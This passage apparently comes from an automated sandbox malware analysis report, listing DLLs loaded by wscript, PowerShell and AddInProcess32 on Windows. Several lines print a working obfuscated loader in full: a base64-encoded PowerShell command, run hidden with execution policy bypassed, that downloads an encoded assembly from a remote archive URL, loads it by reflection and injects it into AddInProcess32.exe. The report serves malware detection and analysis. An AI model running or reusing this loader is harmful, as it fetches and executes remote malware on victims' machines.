9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC61A7000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCc", "0", "false");
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
